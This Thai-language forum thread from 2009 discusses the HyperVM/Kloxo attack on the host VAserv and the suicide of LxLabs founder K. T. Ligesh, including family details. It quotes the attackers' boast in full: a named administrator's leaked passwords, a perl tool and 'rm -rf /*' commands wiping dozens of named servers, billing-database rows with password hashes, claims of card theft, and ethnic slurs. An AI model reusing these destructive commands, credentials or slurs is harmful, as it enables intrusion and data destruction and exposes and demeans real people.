According to the British IT news portal The Register, the company's founder, K. T. Ligesh committed suicide on 8th June, 2009 after he lost a large bid to a competitor and the HyperVM/Kloxo software was defaced in a massive attack at the British VAserv budget webhosting company. Hackers deleted the content of 100,000 hosted websites in one go, after gaining root access to the system via a zero-day SQL injection hole in the HyperVM 2.09 / Kloxo 5.75 suite. Mr. Ligesh had long standing personality problems following his mother's suicide 5 years ago.

ที่มา

http://en.wikipedia.org/wiki/HyperVM

หลังจากคุยกับ support ของ myprohost.com  ก็เลยไปเช็คข่าว ปรากฎว่า K.T.Ligesh ฆ่าตัวตายไปแล้วในวันที่ 8  ทาง myprohost จึงยุติการใช้ HyperVM ทันทีในวันนี้

ระส่ำไปทั่วกับ host ที่ใช้ HyperVM


---------- แถม  ดูความ เลว ของ hacker คนนี้ ---------------
นี่เป็นข้อความที่มันอ้างว่าเป็นผู้ hack HyperVM

อ้างถึงZ3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are
Code:

e2x2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster

f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg
Code:

[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'

• Attempting to login using admin / ****off
  
• Logged in, showtime!
          Output for 67.222.156.106
          Output for xen3ws.vaserv.com
          Output for vz22uk.vaserv.com
          Output for xen4ws.vaserv.com
          Output for vzspecial5.vaserv.com
          Output for xen16.vaserv.com
          Output for vz77uk.vaserv.com
          Output for 91.186.26.128
          Output for xen25.vaserv.com
          Output for vz76uk.vaserv.com
          Output for vz18tx.vaserv.com
          Output for vz75uk.vaserv.com
          Output for vz45uk.vaserv.com
          Output for vzpent16.vaserv.com
          Output for xen1tx.vaserv.com
          Output for vz13tx.vaserv.com
          Output for vz74uk.vaserv.com
          Output for vzspecial8.vaserv.com
          Output for xen24.vaserv.com
          Output for vz73uk.vaserv.com
          Output for rdns1.vaserv.com
          Output for vz2tx.vaserv.com
          Output for vz17tx.vaserv.com
          Output for xen23.vaserv.com
          Output for vz72uk.vaserv.com
          Output for xen22.vaserv.com
          Output for vzruffbuff.vaserv.com
          Output for vzmario.vaserv.com
          Output for xen21.vaserv.com
          Output for vz71uk.vaserv.com
          Output for vzspecial7.vaserv.com
          Output for vz70uk.vaserv.com
          Output for xen20.vaserv.com
          Output for vz69uk.vaserv.com
          Output for vzspecial6.vaserv.com
          Output for vz7uk.vaserv.com
          Output for vzspecial4.vaserv.com
          Output for vzspecial3.vaserv.com
          Output for xen19.vaserv.com
          Output for vzspecial2.vaserv.com
          Output for vzspecial1.vaserv.com
          Output for vzpent3.vaserv.com
  output truncated due to massive boxen outputz
  [root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
  [1] 12399
  [root@vz-vaserv .ssh]#
  
  Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT!
  BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
  Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl
  Code:
  
  1    1     rghf    c32f3310baffcb431875a67196e99ebd     Rus     F     [email protected]                0     ,     
     Edit    Delete    3    1    vlada    c32f3310baffcb431875a67196e99ebd    Vlada    Neskovic    [email protected]              0    ,    
     Edit    Delete    4    1    Kody    fde67637d867c52d739931528dd92ef0    Kody    Riker    [email protected]         Georgia - server22 space 1slot 1gb    0    ,
  
  See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
  Code:
  
  Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)
  SELECT *
  FROM `tblclients`
  LIMIT 0 , 30
  
  Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.
  
  Yea yea "his IP is:64.79.210.78" here i saved u the trouble lolol
  Code:
  
  -bash-3.2# ifconfig
  lo        Link encap:Local Loopback
            inet addr:127.0.0.1  Mask:255.0.0.0
            inet6 addr: ::1/128 Scope:Host
            UP LOOPBACK RUNNING  MTU:16436  Metric:1
            RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
            TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0
            RX bytes:1114930 (1.0 MiB)  TX bytes:1114930 (1.0 MiB)
  
  venet0    Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
            inet addr:127.0.0.1  P-t-P:127.0.0.1  Bcast:0.0.0.0  Mask:255.255.255.255
            UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1
            RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
            TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0
            RX bytes:4462516 (4.2 MiB)  TX bytes:11170841 (10.6 MiB)
  
  venet0:0  Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
            inet addr:64.79.210.78  P-t-P:64.79.210.78  Bcast:64.79.210.78  Mask:255.255.255.255
            UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1
  
  venet0:1  Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
            inet addr:64.79.206.197  P-t-P:64.79.206.197  Bcast:64.79.206.197  Mask:255.255.255.255
            UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1
  
  venet0:2  Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
            inet addr:67.223.225.52  P-t-P:67.223.225.52  Bcast:67.223.225.52  Mask:255.255.255.255
            UP BROADCAST POINTOPOINT RUNNING NOARP  MTU:1500  Metric:1
  
  -bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
  [1] 7643
  -bash-3.2#
  
  I love to rm lol bye
  
  ~Thedefaced.org

อย่างไรหละเนี่ย 

RIP

คน Hack มันลบงานเขาเกลี้ยง หวังว่า Hacker เมื่อได้อ่านข่าวนี้แล้วจะคิดอะไรได้บ้าง

น่าเศร้าเลย 

นักการเมืองบางประเทศน่าเอาอย่างมั่งนะ


ขอแสดงความเสียใจด้วยคับ

RIP

คนๆนี้เสียทุกอย่างไปกับ hacker!

งงๆ..เค้าเป็นใครอะครับ....

ก็นั่นซิ ที่ผมโพสต์ไว้ในกระทู้ fsckvps ล่มไง

ว่าเรื่องนี้ไม่ใช่เรื่องเล็ก....

ผมกำลังมองหาทางไปเหมือนกัน กับ 4 acc ที่เป็น HyperVM
เพราะทุกอย่างคงต้องมีการเปลี่ยนแปลง
แต่ที่แน่ๆ ทุกการเปลี่ยนแปลงกระทบต่อราคา

HyperVM/LXAdmin คิดค่า license อยู่ที่ vm ละ $0.50 เท่านั้น
ราคาของ vps พวกนี้ถึงถูกได้

ในขณะที่ Virtuozzo แพงกว่ามาก
อย่างราคาของ softlayer ถ้าซื้อที่ 10 vps ก็ตั้งเดือนละ $100 เท่ากับ vps ละ $10 แน่ะ

ส่วน open source เจ๋งๆ ก็ยังมองไม่เห็น

เฮ้อ...

ถือว่าท่านทำทุกอย่างดีที่สุดแล้ว...RIP

---------------------------

แก้ไข....

เอาลิ้งค์ที่เกี่ยวข้องจาก forum.lxlabs.com มาฝาก

http://forum.lxlabs.com/index.php?t=msg&th=12375&start=0&

ขอแสดงความเสียใจด้วยครับ
ต้องจับ hacker มาลงโทษให้ได้ 

แย่จังเลยครับ
กระทบกันหลายคนแน่เลย










ขอแสดงความเสียใจด้วยครับ

มันแฮกได้ เราก็ต้องแก้ไขไม่ให้มันทำได้ ไม่ใช่หนีไปทำโปรแกรมรอที่โลกหน้าแบบนี้  

น่าเสียดายคนมีฝีมือดี ๆ ต้องมาจากไป คนแฮกบางคนมันไม่ได้ทำเพราะสนุกหรอก บางทีก็เป็นงานจ้าง, ไม่ว่าแฮก หรือไวรัส ส่วนใหญ่เดี๋ยวนี้ไม่ได้ทำเพราะสนุกหรอกทำเพราะงานจ้าง จากคู่แข่งที่หวังทำลายหรือลดความน่าเชื่อถือ เพื่อที่ต้นจะได้ขึ้นตำแหน่งแทน

อ้างถึงจาก: hermiss ใน 10 มิถุนายน 2009, 04:19:32
มันแฮกได้ เราก็ต้องแก้ไขไม่ให้มันทำได้ ไม่ใช่หนีไปทำโปรแกรมรอที่โลกหน้าแบบนี้ 

ตวามเห็นส่วนตัว และด้วยความเคารพนะครับ....

ผมว่าเค้าอาจจะมีปัญหาเรื่องสุขภาพจิตพอสมควร
เพราะแม่และน้องสาวของเค้าก็แขวนคอตายเมื่อ 5 ปีที่แล้วเหมือนกัน

http://timesofindia.indiatimes.com/Bangalore/Techie-hangs-himself-in-HSR-Layout-/articleshow/4633101.cms

อ้างถึงจาก: zimba ใน 10 มิถุนายน 2009, 04:23:57

อ้างถึงจาก: hermiss ใน 10 มิถุนายน 2009, 04:19:32
มันแฮกได้ เราก็ต้องแก้ไขไม่ให้มันทำได้ ไม่ใช่หนีไปทำโปรแกรมรอที่โลกหน้าแบบนี้ 

ตวามเห็นส่วนตัว และด้วยความเคารพนะครับ....

ผมว่าเค้าอาจจะมีปัญหาเรื่องสุขภาพจิตพอสมควร
เพราะแม่และน้องสาวของเค้าก็แขวนคอตายเมื่อ 5 ปีที่แล้วเหมือนกัน

http://timesofindia.indiatimes.com/Bangalore/Techie-hangs-himself-in-HSR-Layout-/articleshow/4633101.cms

ใช่ครับ  เจ้าของ HyperVM น่าจะมีปัญหาทางจิต  เท่าที่อ่านๆดูข้อมูล เค้าเป็นคน anti สังคม anti-christ พอสมควร   แต่เป็นคนเก่ง

ผมไม่น่าไป hack ของเขาเลย... เสียใจจริงๆ  









อ่ะล้อเล่ง.. เสียใจด้วยครับ ไม่น่าขาดโปเกม่อน ฝีมือดีไปเลย  

เสียใจด้วยนะครับ hacker นี่มันน่าจริงๆ

Hello,

I am very sad to let you all know that Ligesh is no more. Sorry, I could not respond earlier then this.
As you know Ligesh was the sole owner of Lxlabs. I am not sure whether the company Lxlabs will continue to operate in future. I personally am trying NOT to let the products Kloxo and HyperVM die. Since we all know that the software has severe security vulnerabilities at this point, please avoid using them till we get more information about the future of Lxlabs. I will do best what I can in this regard. I appreciate your support
Thanks and Regards

S Bhargava
Lxlabs Support

อ่านนี่แล้วยิ่งใจหายครับ...เอามาจาก

http://forum.lxlabs.com/index.php?t=msg&th=12372&start=0&

เค้าคือผู้ช่วยของ Ligesh ครับ...

I am not sure whether the company Lxlabs will continue to operate in future.
- ผมยังไม่มั่นใจว่า lxlabs จะดำเนินธุรกิจต่อไปในอนาคต

please avoid using them till we get more information about the future of Lxlabs.
- โปรดระมัดระวังในการใช้งาน จนกว่าเราจะได้ข้อมูลเพิ่มเติมเกี่ยวกับอนาคตของ lxlabs

แสดงว่า HyperVM จะไม่มีการปรับปรุงอะไรในช่วงนี้
ช่องโหว่ของระบบ ก็จะยังคงอยู่ให้เราลุ้นกันต่อไป ว่าจะถูก hack วันไหน...

มันอะไรกันนี่ ถึงกับฆ่าตัวตายเลยหรอ

เหตุการณ์นี้ถึงผมจะเสียหายเพราะป่านนี้ยังใช้งานอะไรไม่ได้เลย

แต่ก็จะรอวันนี้อีกวันถ้ายังไม่ได้ก็จะขอ VPS ใหม่

แต่ผมก็ไม่อยากให้ใครมาฆ่าตัวตาย ผมเสียใจกับการจากไปอย่างไม่มีวันกลับจริงๆ

เวรกรรม วงการ host คงระส่ำกันหละสิงานนี้

แฮ็กเกอร์เลวจริงๆ  อยากได้เงินถึงกับทำลายคนอื่น

แต่ถ้าทำเพราะสนุกยิ่งเลวใหญ่

ไว้อาลัยครับ เรื่องแค่นี้ไม่น่าคิดสั้นเลยครับ 

พึ่งลง lxadmin เสร็จ